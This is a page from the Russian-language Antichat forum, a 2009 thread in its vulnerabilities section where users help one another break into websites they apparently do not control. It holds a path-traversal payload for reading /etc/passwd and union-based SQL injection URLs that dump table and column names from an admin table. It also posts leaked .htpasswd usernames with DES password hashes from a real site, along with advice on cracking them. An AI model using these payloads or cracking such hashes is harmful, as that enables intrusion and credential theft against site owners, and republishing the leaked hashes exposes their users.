ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7751  
Старый 20.06.2009, 00:00
FAPSI
Banned
Регистрация: 18.09.2008
Сообщений: 23
Провел на форуме:
94916

Репутация: 5
По умолчанию

нет, как поиметь этот сайт...
У меня рутовый пасс был от сайта на том же двигле. в принципе некоторые скрипты остались.
 
Ответить с цитированием

  #7752  
Старый 20.06.2009, 00:02
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

.php?set_language=../../../../../../../../../../../../etc/passwd%00

дальше объяснять?
 
Ответить с цитированием

  #7753  
Старый 20.06.2009, 00:50
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

мне тут в репу написали про авторизацию
ну да, так насколько я пноимаю это скрипт админки, соответсвенно для эксплуатации уязвимости нужно быть залогиненым под админом
 
Ответить с цитированием

  #7754  
Старый 20.06.2009, 01:08
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию

/home/www/www.****.com/mothers/.htaccess

Цитата:
AuthUserFile /home/www/www.****.com/admin/.htpasswd
AuthName "Embracing Motherhood Mothers Section"
AuthType Basic

require valid-user
/home/www/www.****.com/admin/.htpasswd
Цитата:

nicyr:NSqcB/LOr6Ryw
meahans:X5qeSZwCEAM8M
Чем расштфровать?
 
Ответить с цитированием

  #7755  
Старый 20.06.2009, 03:05
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

farpost, DES, можешь помучать Passwords Pro
 
Ответить с цитированием

  #7756  
Старый 20.06.2009, 20:21
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию

чет непойму

узнаю таблицы все норм...
Цитата:
http://site.com/body.php?id=-1+union+all+select+1,2,3,table_name,5,6,7,8+from+i nformation_schema.tables+limit+1,1--
допустим таблица admin

узнаю колонки тож все норм...
Цитата:
http://site.com/body.php?id=-1+union+all+select+1,2,3,column_name,5,6,7,8+from+ information_schema.columns+where+table_name=0x6164 6d696e--
а вот дальше появляется ошибка даж на этом моменте:
Цитата:
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin+limi t+1,1--
Цитата:
Warning: Supplied argument is not a valid MySQL result resource in /home/www/class.php on line 147........
в чем проблема ???
 
Ответить с цитированием

  #7757  
Старый 20.06.2009, 20:35
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

попробуй UNION+SELECT+
а лучше линк в студию
 
Ответить с цитированием

  #7758  
Старый 20.06.2009, 20:42
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Adm1n4eG,

1. Посмотри в какой бд таблица.
2. Сколько в ней записей.
 
Ответить с цитированием

  #7759  
Старый 20.06.2009, 20:46
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Может быть что там идет например 2 гверя а при - limit+1,1 нету там столько вот и во второй запрос идет пустое значение, крч линк в студию а то так можно долго гадать.
 
Ответить с цитированием

  #7760  
Старый 20.06.2009, 20:51
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию

union+select тож пробовал не получается(
и причем подставляю любую таблицу всеравно ошибка появляется...
пробовал пробелы + /**/ ставить...
пробовал хешировать название таблиц по разному тож не выходит (((
насчет лимита нет он тут не причем по идее ошибки не должно быть уже при
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin--

DATABASE():db_handset
VERSION():5.0.27-standard-log
78 таблиц в базе

извенить линк дать не могу...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ